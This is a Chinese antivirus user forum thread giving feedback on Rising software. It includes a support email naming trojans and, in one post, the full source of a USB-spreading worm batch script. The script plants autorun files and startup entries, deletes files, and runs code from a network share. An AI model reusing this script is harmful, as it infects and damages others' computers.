我想知道,瑞星杀毒的时候,那个掘腚的小狮子有什么用?没用别老叫他出来了,机器杀毒时候本来就卡!!pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

系统关键部位锁定
（可选择设置）

瑞星杀毒软件内存占用大了一点
即使在没有非系统程序（不包括RAV/RFW）运行的情况下
RAV＋RFW同时运行，系统PF使用率在180M左右
尤其是杀毒软件占用超过一半
希望瑞星杀毒软件能改进一些。

系统 XP2
内存 256
硬盘 80G
建议推出两个版本：
精装版 适合低配置系统
安全加固版 适合要求比较高的用户
pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

对rar文件的深度支持不够
如果是rar下有文件夹瑞星就提示没有病毒 不会全解开再杀毒啊
晕pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

引用:

【ipms238的贴子】　　装完瑞星后，我不想让瑞星开机自动运行。可我无论怎么设置瑞星，它都会在开机时自动启动。于是我准备把瑞星注册表的启动项删除，结果提示删除出错。我估计是瑞星的进程在作怪，于是想到要把瑞星的进程结束，结果却又提示无法中止进程。最终只好通过IceSword软件结束瑞星的进程，才删除了瑞星的注册表启动项。 　　可是最近当我更新了瑞星后，瑞星注册表的启动项又回来了，重新开机后又看到了那绿色的雨伞……又要我再删？我说瑞星这样做何苦呢？我不需要用的时候就真的不需要用，希望瑞星不要赖再进程里不走！不让删除开机的启动项也就算了，至少也给我们留一个完全关闭瑞星的监控中心的功能吧？（平时当我们想关闭瑞星的监控中心时，瑞星给我们的只有“转入后台自动处理”的选项，虽然点击后绿色的雨伞会消失，但是瑞星仍然会呆在进程中。这实在令我无法接受。） 　　你们是怎么看待这个问题的呢？是不是瑞星也该给我们用户一些选择的空间？ ………………

强烈建议楼主删除瑞星pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

希望瑞星2008能防止查杀未知木马群。pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：

1.文件名：1.exe
    病毒名：Trojan.PSW.OnlineGames.bdp

    2.文件名：2.exe
    病毒名：Trojan.PSW.CABALOnline.ahs

    3.文件名：3.exe
    病毒名：Trojan.PSW.OnlineGames.bdq

    4.文件名：4.exe
    病毒名：Trojan.PSW.CABALOnline.ahr

    5.文件名：4.exe.20070508-092834-00.hdmp
    不是病毒

    6.文件名：AUTORUN.INF
    不是病毒

    7.文件名：cmdbcs.exe
    病毒名：Trojan.PSW.OnlineGames.bde

    8.文件名：Deledomn.bat
    不是病毒

    9.文件名：DSPA.tmp
    不是病毒

    10.文件名：DSPB.tmp
    不是病毒

    11.文件名：iexp10re.exe
    病毒名：Trojan.PSW.OnlineGames.bdq

    12.文件名：iexpl0re.exe
    病毒名：Trojan.PSW.CABALOnline.ahs

    13.文件名：Kavs0.dll
    病毒名：Trojan.PSW.OnlineGames.bdp

    14.文件名：LgSy0.dll
    病毒名：Trojan.PSW.CABALOnline.ahr

    15.文件名：LgSy1.dll
    病毒名：Trojan.PSW.CABALOnline.ahr

    16.文件名：mppds.dll
    病毒名：Trojan.PSW.OnlineGames.bdr

    17.文件名：mppds.exe
    病毒名：Trojan.PSW.OnlineGames.bdr

    18.文件名：qjzo0.dll
    病毒名：Trojan.PSW.OnlineGames.bdq

    19.文件名：Servera.exe
    病毒名：Trojan.PSW.OnlineGames.bdp

    20.文件名：servet.exe
    病毒名：Trojan.DL.Small.vcc

    21.文件名：SETUP.EXE
    不是病毒

    22.文件名：TIMPlatform.exe
    病毒名：Trojan.DL.Small.vas

    23.文件名：TWAIN.LOG
    不是病毒

    24.文件名：winlog0n.exe
    病毒名：Trojan.PSW.CABALOnline.ahr

    25.文件名：_tmp_qq_proxy.ini
    不是病毒
我们将在较新的19.23.01版本(瑞星2006的18.79.01版本)中处理解决，请您届时将您的瑞星软件升级到19.23.01(瑞星2006的18.79.01版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级。

注意：如果您上报的文件损坏或者压缩包有密码保护，会导致我们无法正确分析，请您确认文件正常且压缩包中无密码后再提交。
如有问题，您可以通过电话或者邮件服务中心与我们联系，详细描述您的问题，并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。
提    醒：为保证收到您的来信，请勿直接回复本邮件!!!
-------------------------------------------------------------
服务单位：瑞星·客户服务中心
工 程 师：YFB001
电话服务：（010）82678800
发送邮件：请用IE等浏览器访问网址 http://csc.rising.com.cn

希望能防止查杀类似这些未知病毒。pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

并且希望瑞星能查杀这个批处理，该批处理文件名为：U.bat，运行后，运行CMD.exe等，系统发生故障，硬盘双击打不开等症状

以下是u.bat的内容：

@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo.看到这个，请不要慌张。电脑病毒的定义为：1、传播性；2、潜伏性；3、破坏性。根据此定义，本脚本这完全符合1，有点符合2，不符合3（若说破坏性也不是没有，但只针对U盘病毒，而且会在删除文件前备份，备份地址：%systemroot%\bakfiles\），因此，病毒二字加了引号，即不是真正的病毒。本脚本的目的是通过U盘传播，并沿途清理U盘中的病毒，如果可能，会把收集到的病毒文件发给作者；不会给您造成太多不便（与其被U盘病毒感染，不如被本脚本感染啦）。如果您觉得这样给您造成了不便，想卸载本脚本，请在%systemdrive%\下新建一个名为8bye的文本文件（不需要写入内容，即：新建%endf%），大约在20秒内完成卸载，并帮助您进行U盘病毒免疫。欲了解更多，请打开 U盘病毒分析 的自述文件（地址：%systemroot%\readme.txt）。谢谢！
echo.包含文件：u.bat（本文件，4240字节）、uda.a（21674字节，md5：e6762ebf6123bc17ab31995c61bba955）
echo.为研究性学习而制作，于2007-03-15，望多多支持！作者：CyyIsGood（肇中高一11），联系：cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

引用:

【咖啡~回味的贴子】瑞星许多人不用它的最简单理由就是：资源占用过大。 虽然2007版改进很大，资源占用也降低了不少，但是相对于其它国内杀染，还是有占用过大的毛病。 这方面瑞星需要再加强改进。 界面可以再做的缩小一点。 ………………

资源占用是个大问题
pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

这可是在进系统后，开了1个QQ和MSN，网页四个窗口，然后什么都不操作状态pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼

瑞星98年成立的，那明年可刚好十年，值得庆祝啊

希望以下几点：（能在2007版本实现是最好的，别让我们等1年）

1.加强自我保护，不要让病毒轻易杀了瑞星
2.继续加强病毒查杀能力（最近表现不错）
3.是时候瑞星也该加入启发杀毒和主动防御了
4.瑞星占用资源大一直是很多用户不用瑞星原因之一，瑞星文件夹，我这里有209M，太大了，进程也是太多了，看见就怕
5.顶12楼的朋友，要求周六周日也发布更新包，发布一个就可以了
pa)âfxü‡¯bbs.ikaka.comÂÎàKƬl"¼